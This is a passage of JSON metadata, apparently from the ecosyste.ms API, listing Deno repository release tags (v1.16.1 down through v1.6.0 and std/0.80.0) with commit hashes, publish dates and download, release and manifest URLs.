/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositorie